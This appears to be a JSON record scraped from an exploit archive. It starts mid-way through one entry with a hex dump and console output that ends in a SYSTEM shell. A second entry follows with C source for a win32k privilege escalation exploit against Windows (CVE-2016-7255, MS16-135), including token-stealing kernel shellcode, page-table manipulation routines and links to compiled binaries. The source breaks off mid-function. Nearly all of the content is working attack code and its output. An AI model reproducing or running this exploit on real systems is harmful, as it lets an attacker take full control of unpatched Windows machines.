| ................\r\n000000003D9EC9B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC9C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC9D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC9E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC9F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECA00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECA10 | 00 00 00 00 00 00 00 00 63 d8 47 00 00 00 00 00 | ........c.G.....\r\n000000003D9ECA20 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECA30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECA40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECA50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECA60 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECA70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECA80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECA90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECAA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECAB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECAC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECAD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECAE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECAF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECB00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECB10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECB20 | 00 00 00 00 00 00 00 00 63 18 8b 00 00 00 00 00 | ........c.......\r\n000000003D9ECB30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECB40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECB50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECB60 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECB70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECB80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECB90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECBA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECBB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECBC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECBD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECBE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECBF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECC00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECC10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECC20 | 63 78 82 00 00 00 00 00 00 00 00 00 00 00 00 00 | cx..............\r\n000000003D9ECC30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECC40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECC50 | 63 b8 57 00 00 00 00 00 00 00 00 00 00 00 00 00 | c.W.............\r\n000000003D9ECC60 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECC70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECC80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECC90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECCA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECCB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECCC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECCD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECCE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECCF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECD00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECD10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECD20 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECD30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECD40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECD50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECD60 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECD70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECD80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECD90 | 63 08 a9 30 01 00 00 00 63 68 c2 2a 00 00 00 00 | c..0....ch.*....\r\n000000003D9ECDA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECDB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECDC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECDD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECDE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECDF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECE00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECE10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECE20 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECE30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECE40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECE50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECE60 | 63 78 8b 00 00 00 00 00 00 00 00 00 00 00 00 00 | cx..............\r\n000000003D9ECE70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECE80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECE90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECEA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECEB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECEC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECED0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECEE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECEF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECF00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECF10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECF20 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECF30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECF40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECF50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECF60 | 67 18 21 00 01 00 00 80 00 00 00 00 00 00 00 00 | g.!.............\r\n000000003D9ECF70 | 00 00 00 00 00 00 00 00 63 10 98 00 00 00 00 00 | ........c.......\r\n000000003D9ECF80 | 63 40 98 00 00 00 00 00 00 00 00 00 00 00 00 00 | [email\u00a0protected]\r\n000000003D9ECF90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECFA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECFB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECFC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECFD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECFE0 | 63 d8 34 02 00 00 00 00 63 38 8c 00 00 00 00 00 | c.4.....c8......\r\n000000003D9ECFF0 | 00 00 00 00 00 00 00 00 63 f0 99 00 00 00 00 00 | ........c.......\r\n \r\n+] Selected spurious PML4E: fffff67b3d9ecf00\r\n+] Spurious PT: fffff67b3d9e0000\r\n+] Content pml4e fffff67b3d9ecff8: 99f063\r\n+] Patching the Spurious Offset with 99f067\r\n+] Content pdpte fffff67b3d9ffff8: 9a0063\r\n+] Patching the Spurious Offset with 9a0067\r\n+] Content pdpte fffff67b3ffffff0: 821063\r\n+] Patching the Spurious Offset with 821067\r\n+] Content pte fffff67fffffe800: 1967\r\n+] Patching the Spurious Offset with 1967\r\nOriginal HalpIntteruptRequest pointer: fffff80150e1fc40\r\n+] Selected spurious PML4E: fffff67b3d9ecf08\r\n+] Spurious PT: fffff67b3d9e1000\r\n+] Content pml4e fffff67b3d9ecff8: 99f063\r\n+] Patching the Spurious Offset with 99f067\r\n+] Content pdpte fffff67b3d9ffff8: 9a0063\r\n+] Patching the Spurious Offset with 9a0067\r\n+] Content pdpte fffff67b3ffffff0: 821063\r\n+] Patching the Spurious Offset with 821067\r\n+] Content pte fffff67fffffe800: 1967\r\n*** Patching the original location to enable NX...\r\n+] Patching the Spurious Offset with 1967\r\nHAL address: fffff67b3d9e1000\r\n+] w00t: Shellcode stored at: ffffffffffd00d50\r\n+] Selected spurious PML4E: fffff67b3d9ecf10\r\n+] Spurious PT: fffff67b3d9e2000\r\n+] Content pml4e fffff67b3d9ecff8: 99f063\r\n+] Patching the Spurious Offset with 99f067\r\n+] Content pdpte fffff67b3d9ffff8: 9a0063\r\n+] Patching the Spurious Offset with 9a0067\r\n+] Content pdpte fffff67b3ffffff0: 821063\r\n+] Patching the Spurious Offset with 821067\r\n+] Content pte fffff67fffffe800: 1967\r\n+] Patching the Spurious Offset with 1967\r\nPatch HalpInterruptController->HalpApicRequestInterrupt: fffff67b3d9e26e8 with ffffffffffd00d50\r\nMicrosoft Windows [Version 10.0.14393]\r\n(c) 2016 Microsoft Corporation. All rights reserved.\r\n \r\nC:\\Users\\qa\\Desktop>\r\nC:\\Users\\qa\\Desktop>whoami\r\nnt authority\\system\r\n \r\nC:\\Users\\qa\\Desktop>\n\n# 0day.today [2018-02-18] #", "sourceHref": "https://0day.today/exploit/26414", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-04T07:12:42", "description": "Exploit for windows platform in category local exploits", "edition": 1, "published": "2017-01-11T00:00:00", "title": "Microsoft Windows Kernel - win32k.sys NtSetWindowLongPtr Privilege Escalation (MS16-135) (2)", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-7255"], "modified": "2017-01-11T00:00:00", "href": "https://0day.today/exploit/description/26645", "id": "1337DAY-ID-26645", "sourceData": "/*\r\nSource: https://ricklarabee.blogspot.com/2017/01/virtual-memory-page-tables-and-one-bit.html\r\n \r\nBinary: https://github.com/rlarabee/exploits/raw/8b9eb646516d7f022a010f28018209f331c28975/cve-2016-7255/compiled/cve-2016-7255.exe\r\nMirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41015.exe\r\n*/\r\n \r\n// ricklarabee.blogspot.com\r\n \r\n//This program is free software; you can redistribute it and/or\r\n//modify it under the terms of the GNU General Public License\r\n//as published by the Free Software Foundation.\r\n \r\n//This program is distributed in the hope that it will be useful,\r\n//but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n//MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.See the\r\n//GNU General Public License for more details.\r\n \r\n//You should have received a copy of the GNU General Public License\r\n//along with this program; if not, write to the Free Software\r\n//Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\r\n \r\n// Credits: [email\u00a0protected]: https://github.com/IOActive/I-know-where-your-page-lives/tree/master/code/CVE-2016-7255\r\n// PoC from https://github.com/tinysec/public/tree/master/CVE-2016-7255\r\n \r\n#include <windows.h>\r\n#include <wchar.h>\r\n#include <stdlib.h>\r\n#include <stdio.h>\r\n \r\n#pragma comment(lib,\"ntdll.lib\")\r\n#pragma comment(lib,\"user32.lib\")\r\n#pragma comment(lib, \"advapi32\")\r\n \r\nUINT64 PML4_BASE;\r\nUINT PML4_SELF_REF_INDEX;\r\nUINT64 PML4_SELF_REF = 0xFFFFF6FB7DBEDF68;\r\n \r\n#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)\r\n#define STATUS_UNSUCCESSFUL ((NTSTATUS)0xC0000001L)\r\n#define GET_INDEX(va) ( ((va >> 39) & 0x1ff )) \r\n \r\n////////////////////////////////////////////////////////\r\n// Define Data Types\r\n////////////////////////////////////////////////////////\r\ntypedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {\r\n PVOID Unknown1;\r\n PVOID Unknown2;\r\n PVOID Base;\r\n ULONG Size;\r\n ULONG Flags;\r\n USHORT Index;\r\n USHORT NameLength;\r\n USHORT LoadCount;\r\n USHORT PathLength;\r\n CHAR ImageName[256];\r\n} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;\r\n \r\ntypedef struct _SYSTEM_MODULE_INFORMATION {\r\n ULONG Count;\r\n SYSTEM_MODULE_INFORMATION_ENTRY Module[1];\r\n} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;\r\n \r\ntypedef enum _SYSTEM_INFORMATION_CLASS { \r\n SystemModuleInformation = 11,\r\n SystemHandleInformation = 16\r\n} SYSTEM_INFORMATION_CLASS;\r\n \r\ntypedef NTSTATUS (WINAPI *NtQuerySystemInformation_t)(IN SYSTEM_INFORMATION_CLASS SystemInformationClass,\r\n OUT PVOID SystemInformation,\r\n IN ULONG SystemInformationLength,\r\n OUT PULONG ReturnLength);\r\n \r\ntypedef NTSTATUS (WINAPI *NtQueryIntervalProfile_t)(IN ULONG ProfileSource,\r\n OUT PULONG Interval);\r\n \r\nNtQuerySystemInformation_t NtQuerySystemInformation;\r\nNtQueryIntervalProfile_t NtQueryIntervalProfile;\r\n \r\nchar shellcode[] = {\r\n //0xcc,\r\n 0xfa, // CLI\r\n 0x9c, // PUSHFQ\r\n 0x48, 0xb8, 0x90, 0x90, 0x90 ,0x90 ,0x90, 0x90, 0x90, 0x90, // MOV RAX, Original Pointer\r\n 0x50, // PUSH RAX\r\n 0x51, // PUSH RCX\r\n 0x48, 0xb9, 0x90, 0x90, 0x90 ,0x90 ,0x90, 0x90, 0x90, 0x90, // MOV RCX, [OverwriteAddr+OverwriteOffset]\r\n 0x48, 0x89, 0x01, // MOV QWORD PTR [RCX], RAX\r\n 0xb9, 0x90, 0x90, 0x90, 0x90, // MOV ECX, PID\r\n 0x53, // PUSH RBX\r\n \r\n 0x65, 0x48, 0x8B, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, // MOV RAX,QWORD PTR gs:0x188\r\n 0x48, 0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00, // MOV RAX,QWORD PTR [RAX+0xb8] EPROCESS\r\n 0x48, 0x8d, 0x80, 0x90, 0x90, 0x00, 0x00, // LEA RAX,[RAX+0xActiveProcessLinkOffset] \r\n //<tag>\r\n 0x48, 0x8b, 0x00, // MOV RAX,QWORD PTR [RAX]\r\n 0x48, 0x8b, 0x58, 0xf8, // MOV RBX,QWORD PTR [RAX-0x8] // UniqueProcessID\r\n 0x48, 0x83, 0xfb, 0x04, // CMP RBX,0x4\r\n 0x75, 0xf3, // JNE <tag>\r\n 0x48, 0x8b, 0x98, 0x90, 0x90, 0x90, 0x90, // MOV RBX, QWORD PTR [RAX+0x60] // GET TOKEN of SYSTEM\r\n \r\n 0x53, // PUSH RBX\r\n //<tag2>\r\n 0x48, 0x8b, 0x00, // MOV RAX,QWORD PTR [RAX]\r\n 0x48, 0x8b, 0x58, 0xf8, // MOV RBX,QWORD PTR [RAX-0x8] // UniqueProcessID\r\n 0x39, 0xcb, // CMP EBX, ECX // our PID\r\n 0x75, 0xf5, // JNE <tag2>\r\n 0x5b, // POP RBX\r\n 0x48, 0x89, 0x98, 0x90, 0x90, 0x90, 0x90, // MOV QWORD PTR[RAX + 0x60], RBX\r\n \r\n 0x5b, // POP RBX\r\n 0x59, // POP RCX\r\n 0x58, // POP RAX\r\n 0x9d, // POPFQ\r\n \r\n 0xfb, // STI\r\n 0xff, 0xe0 // JMP RAX\r\n};\r\n \r\nULONG __cdecl DbgPrint(__in char* Format, ...)\r\n{\r\n CHAR* pszDbgBuff = NULL;\r\n va_list VaList = NULL;\r\n ULONG ulRet = 0;\r\n \r\n do\r\n {\r\n pszDbgBuff = (CHAR*)HeapAlloc(GetProcessHeap(), 0, 1024 * sizeof(CHAR));\r\n if (NULL == pszDbgBuff)\r\n {\r\n break;\r\n }\r\n RtlZeroMemory(pszDbgBuff, 1024 * sizeof(CHAR));\r\n \r\n va_start(VaList, Format);\r\n \r\n _vsnprintf((CHAR*)pszDbgBuff, 1024 - 1, Format, VaList);\r\n \r\n \r\n OutputDebugStringA(pszDbgBuff);\r\n \r\n va_end(VaList);\r\n \r\n } while (FALSE);\r\n \r\n if (NULL != pszDbgBuff)\r\n {\r\n HeapFree(GetProcessHeap(), 0, pszDbgBuff);\r\n pszDbgBuff = NULL;\r\n }\r\n \r\n return ulRet;\r\n}\r\n \r\n \r\nint _sim_key_down(WORD wKey)\r\n{\r\n INPUT stInput = { 0 };\r\n \r\n do\r\n {\r\n stInput.type = INPUT_KEYBOARD;\r\n stInput.ki.wVk = wKey;\r\n stInput.ki.dwFlags = 0;\r\n \r\n SendInput(1, &stInput, sizeof(stInput));\r\n \r\n } while (FALSE);\r\n \r\n return 0;\r\n}\r\n \r\nint _sim_key_up(WORD wKey)\r\n{\r\n INPUT stInput = { 0 };\r\n \r\n do\r\n {\r\n stInput.type = INPUT_KEYBOARD;\r\n stInput.ki.wVk = wKey;\r\n stInput.ki.dwFlags = KEYEVENTF_KEYUP;\r\n \r\n SendInput(1, &stInput, sizeof(stInput));\r\n \r\n } while (FALSE);\r\n \r\n return 0;\r\n}\r\n \r\nint _sim_alt_shift_esc()\r\n{\r\n int i = 0;\r\n \r\n do\r\n {\r\n _sim_key_down(VK_MENU);\r\n _sim_key_down(VK_SHIFT);\r\n \r\n \r\n _sim_key_down(VK_ESCAPE);\r\n _sim_key_up(VK_ESCAPE);\r\n \r\n _sim_key_down(VK_ESCAPE);\r\n _sim_key_up(VK_ESCAPE);\r\n \r\n _sim_key_up(VK_MENU);\r\n _sim_key_up(VK_SHIFT);\r\n \r\n \r\n } while (FALSE);\r\n \r\n return 0;\r\n}\r\n \r\n \r\n \r\nint _sim_alt_shift_tab(int nCount)\r\n{\r\n int i = 0;\r\n HWND hWnd = NULL;\r\n \r\n \r\n int nFinalRet = -1;\r\n \r\n do\r\n {\r\n _sim_key_down(VK_MENU);\r\n _sim_key_down(VK_SHIFT);\r\n \r\n \r\n for (i = 0; i < nCount; i++)\r\n {\r\n _sim_key_down(VK_TAB);\r\n _sim_key_up(VK_TAB);\r\n \r\n Sleep(1000);\r\n \r\n }\r\n \r\n \r\n _sim_key_up(VK_MENU);\r\n _sim_key_up(VK_SHIFT);\r\n } while (FALSE);\r\n \r\n return nFinalRet;\r\n}\r\n \r\nint _sim_alt_esc(int count)\r\n{\r\n int i = 0;\r\n \r\n for (i = 0; i<count; i++)\r\n {\r\n _sim_key_down(VK_MENU);\r\n //_sim_key_down(VK_SHIFT);\r\n \r\n \r\n _sim_key_down(VK_ESCAPE);\r\n _sim_key_up(VK_ESCAPE);\r\n \r\n _sim_key_down(VK_ESCAPE);\r\n _sim_key_up(VK_ESCAPE);\r\n \r\n _sim_key_up(VK_MENU);\r\n //_sim_key_up(VK_SHIFT);\r\n \r\n }\r\n \r\n return 0;\r\n}\r\n \r\n \r\nint or_address_value_4(__in void* pAddress)\r\n{\r\n WNDCLASSEXW stWC = { 0 };\r\n \r\n HWND hWndParent = NULL;\r\n HWND hWndChild = NULL;\r\n \r\n WCHAR* pszClassName = L\"cve-2016-7255\";\r\n WCHAR* pszTitleName = L\"cve-2016-7255\";\r\n \r\n void* pId = NULL;\r\n MSG stMsg = { 0 };\r\n \r\n UINT64 value = 0;\r\n \r\n do\r\n {\r\n \r\n stWC.cbSize = sizeof(stWC);\r\n stWC.lpfnWndProc = DefWindowProcW;\r\n stWC.lpszClassName = pszClassName;\r\n \r\n if (0 == RegisterClassExW(&stWC))\r\n {\r\n break;\r\n }\r\n \r\n hWndParent = CreateWindowExW(\r\n 0,\r\n pszClassName,\r\n NULL,\r\n WS_OVERLAPPEDWINDOW | WS_VISIBLE,\r\n 0,\r\n 0,\r\n 360,\r\n 360,\r\n NULL,\r\n NULL,\r\n GetModuleHandleW(NULL),\r\n NULL\r\n );\r\n \r\n if (NULL == hWndParent)\r\n {\r\n break;\r\n }\r\n \r\n hWndChild = CreateWindowExW(\r\n 0,\r\n pszClassName,\r\n pszTitleName,\r\n WS_OVERLAPPEDWINDOW | WS_VISIBLE | WS_CHILD,\r\n 0,\r\n 0,\r\n 160,\r\n 160,\r\n hWndParent,\r\n NULL,\r\n GetModuleHandleW(NULL),\r\n NULL\r\n );\r\n \r\n if (NULL == hWndChild)\r\n {\r\n break;\r\n }\r\n \r\n#ifdef _WIN64\r\n pId = ((UCHAR*)pAddress - 0x28);\r\n#else\r\n pId = ((UCHAR*)pAddress - 0x14);\r\n#endif // #ifdef _WIN64\r\n \r\n SetWindowLongPtr(hWndChild, GWLP_ID, (LONG_PTR)pId);\r\n \r\n DbgPrint(\"hWndChild = 0x%p\\n\", hWndChild);\r\n \r\n ShowWindow(hWndParent, SW_SHOWNORMAL);\r\n \r\n SetParent(hWndChild, GetDesktopWindow());\r\n \r\n SetForegroundWindow(hWndChild);\r\n \r\n _sim_alt_shift_tab(4);\r\n \r\n SwitchToThisWindow(hWndChild, TRUE);\r\n \r\n _sim_alt_shift_esc();\r\n \r\n while (GetMessage(&stMsg, NULL, 0, 0)) {\r\n \r\n SetFocus(hWndParent);\r\n _sim_alt_esc(20);\r\n SetFocus(hWndChild);\r\n _sim_alt_esc(20);\r\n \r\n TranslateMessage(&stMsg);\r\n DispatchMessage(&stMsg);\r\n \r\n if (value != 0) {\r\n break;\r\n }\r\n \r\n \r\n __try {\r\n value = *(UINT64 *)PML4_SELF_REF;\r\n if ((value & 0x67) == 0x67) {\r\n printf(\"Value Self Ref = %llx\\n\", value);\r\n break;\r\n }\r\n }\r\n __except (EXCEPTION_EXECUTE_HANDLER) {\r\n continue;\r\n }\r\n \r\n }\r\n \r\n \r\n } while (FALSE);\r\n \r\n if (NULL != hWndParent)\r\n {\r\n DestroyWindow(hWndParent);\r\n hWndParent = NULL;\r\n }\r\n \r\n if (NULL != hWndChild)\r\n {\r\n DestroyWindow(hWndChild);\r\n hWndChild = NULL;\r\n }\r\n \r\n UnregisterClassW(pszClassName, GetModuleHandleW(NULL));\r\n \r\n return 0;\r\n}\r\n \r\nUINT64 get_pxe_address(UINT64 address) {\r\n UINT entry = PML4_SELF_REF_INDEX;\r\n UINT64 result = address >> 9;\r\n UINT64 lower_boundary = ((UINT64)0xFFFF << 48) | ((UINT64)entry << 39);\r\n UINT64 upper_boundary = (((UINT64)0xFFFF << 48) | ((UINT64)entry << 39) + 0x8000000000 - 1) & 0xFFFFFFFFFFFFFFF8;\r\n result = result | lower_boundary;\r\n result = result & upper_boundary;\r\n return result;\r\n}\r\n \r\nUINT64 look_free_entry_pml4(void) {\r\n // Looks for a free pml4e in the last 0x100 bytes of the PML4\r\n int offset = 0xF00;\r\n UINT64 pml4_search = PML4_BASE + offset;\r\n while (offset < 0xFF8)\r\n {\r\n if ((*(PVOID *)pml4_search) == 0x0)\r\n {\r\n // This is a NULL (free) entry\r\n break;\r\n }\r\n offset += 8;\r\n pml4_search = PML4_BASE + offset;\r\n }\r\n return pml4_search;\r\n}\r\n \r\nUINT64 calculate_spurious_pt_address(UINT64 spurious_offset) {\r\n UINT64 index = (spurious_offset & 0xFFF) / 8;\r\n UINT64 result = (\r\n ((UINT64)0xFFFF << 48) |\r\n ((UINT64)PML4_SELF_REF_INDEX << 39) |\r\n ((UINT64)PML4_SELF_REF_INDEX << 30) |\r\n ((UINT64)PML4_SELF_REF_INDEX << 21) |\r\n (index << 12)\r\n );\r\n return result;\r\n}\r\n \r\n \r\n \r\nUINT64 create_spurious_pte_to_virtual_address(UINT64 virtual_address, BOOL patch_original) {\r\n \r\n /*\r\n 1: kd> !pte ffffffff`ffd00000\r\n VA ffffffffffd00000\r\n PXE at FFFFF6FB7DBEDFF8 PPE at FFFFF6FB7DBFFFF8 PDE at FFFFF6FB7FFFFFF0 PTE at FFFFF6FFFFFFE800\r\n contains 0000000000A1F063 contains 0000000000A20063 contains 0000000000A25063 contains 8000000000103963\r\n pfn a1f-- - DA--KWEV pfn a20-- - DA--KWEV pfn a25-- - DA--KWEV pfn 103 - G - DA--KW - V\r\n */ \r\n \r\n UINT64 pte = get_pxe_address(virtual_address);\r\n int pte_offset = pte & 0xFFF;\r\n //printf(\"PTE: %llx, %x\\n\", pte, pte_offset);\r\n \r\n UINT64 pde = get_pxe_address(pte);\r\n int pde_offset = pde & 0xFFF;\r\n //printf(\"PDE: %llx, %x\\n\", pde, pde_offset);\r\n \r\n UINT64 pdpte = get_pxe_address(pde);\r\n int pdpte_offset = pdpte & 0xFFF;\r\n //printf(\"PDPTE: %llx,%x\\n\", pdpte, pdpte_offset);\r\n \r\n UINT64 pml4e = get_pxe_address(pdpte);\r\n int pml4e_offset = pml4e & 0xFFF;\r\n //printf(\"PML4E: %llx\\n\", pml4e, pml4e_offset);\r\n \r\n UINT64 spurious_offset = look_free_entry_pml4();\r\n printf(\"[+] Selected spurious PML4E: %llx\\n\", spurious_offset);\r\n UINT64 f_e_pml4 = spurious_offset;\r\n UINT64 spurious_pt = calculate_spurious_pt_address(spurious_offset);\r\n printf(\"[+] Spurious PT: %llx\\n\", spurious_pt);\r\n printf(\"--------------------------------------------------\\n\\n\");\r\n \r\n \r\n //Read the physical address of pml4e \r\n UINT64 pml4e_pfn = (UINT64)(*(PVOID *)pml4e);\r\n printf(\"[+] Content pml4e %llx: %llx\\n\", pml4e, pml4e_pfn);\r\n // Change the PxE\r\n pml4e_pfn = pml4e_pfn | 0x67; // Set U/S\r\n \r\n printf(\"[+] Patching the Spurious Offset (PML4e) %llx: %llx\\n\",f_e_pml4, pml4e_pfn);\r\n *((PVOID *)spurious_offset) = (PVOID)pml4e_pfn;\r\n Sleep(0x1); // Sleep for TLB refresh;\r\n \r\n //Read the physical address of pdpte\r\n UINT64 pdpte_pfn = (UINT64) *(PVOID *)(spurious_pt + pdpte_offset);\r\n printf(\"[+] Content pdpte %llx: %llx\\n\", pdpte, pdpte_pfn);\r\n // Change the PxE\r\n pdpte_pfn = pdpte_pfn | 0x67; // Set U/S\r\n printf(\"[+] Patching the Spurious Offset (PDPTE) %llx: %llx\\n\", spurious_offset, pdpte_pfn);\r\n *((PVOID *)spurious_offset) = (PVOID)pdpte_pfn;\r\n Sleep(0x1); // Sleep for TLB refresh;\r\n \r\n //Read the physical address of pde\r\n UINT64 pde_addr = spurious_pt + pde_offset;\r\n UINT64 pde_pfn = (UINT64) *(PVOID *)(spurious_pt + pde_offset);\r\n printf(\"[+] Content pdpe %llx: %llx\\n\", pde, pde_pfn);\r\n // Change the 